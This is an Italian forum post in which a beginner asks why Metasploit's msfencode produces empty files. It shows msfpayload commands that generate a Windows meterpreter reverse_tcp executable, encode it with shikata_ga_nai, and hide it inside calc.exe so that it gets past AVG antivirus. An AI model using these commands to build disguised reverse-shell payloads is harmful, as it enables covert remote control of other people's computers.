Ciao a tutti,
Sono un newbie ed è la prima volta che cerco di utilizzare metasploit framework 3 console con backtrack 4 r2 (installata su HD di un portatile acer aspire one)…

Sono, come già detto, alle prime armi e la mia conoscenza informatica è basata solo sulle varie guide che ho trovato nel web, per cui, per favore siate pazienti

Ho cercato di creare un .exe con metasploit con questo comando:

./msfpayload windows/meterpreter/reverse_tcp LHOST=<my_ip> LPORT= 4444 X > myfile.exe

Tutto ok, il file viene generato ed ha una grandezza di 72 kb.

Ovviamente myfile.exe viene riconosciuto dall’antivirus AVG di un altro MIO computer con windows xp sp3.

Se provo ad accedere al file, mi dice “accesso negato etc. etc.”

Ho cercato allora di encodarlo con il comando :

./msfpayload windows/meterpreter/reverse_tcp LHOST=<my_ip> LPORT=4444 R |./msfencode -t exe -x root/payload.exe -k -o myfile2.exe -e x86/shikata_ga_nai -c 50

Sembrerebbe tutto ok perché ho ottenuto:
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

fino a:
[*] x86/shikata_ga_nai succeeded with size 1684 (iteration=50)

Il problema è che il file myfile2.exe viene generato, ma la sua dimensione è 0 KB! E’ vuoto.

Ho anche cercato di codificare un paylod utilizzando la calcolatrice di Windows (calc.exe) con il comando:

./msfpayload windows/meterpreter/reverse_tcp LHOST==<my_ip> |./msfencode -t exe -x /root/calc.exe -k -o calc2.exe -e x86/shikata_ga_nai -c 5

In questo caso ottengo il file calc2.exe con dimensione 116 KB, ma con il medesimo problema, cioè.che viene riconosciuto da AVG .

Provando allora ad aumentare il parametro –c a 50 per bypassare AVG:

./msfpayload windows/meterpreter/reverse_tcp LHOST==<my_ip> |./msfencode -t exe -x /root/calc.exe -k -o calc3.exe -e x86/shikata_ga_nai -c 50

ottengo come prima l’output:
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

fino a:
[*] x86/shikata_ga_nai succeeded with size 1684 (iteration=50)

Ma il file calc3.exe è ancora di 0 KB

Il problema persiste con qualsiasi valore assegnato al parametro -c

Dove sto sbagliando?

Spero di aver postato nella sezione giusta (in caso diverso prego gli amministratori di scusarmi) e di non aver infranto nessuna regola del forum…

Ringrazio anticipatamente per l’eventuale risposta…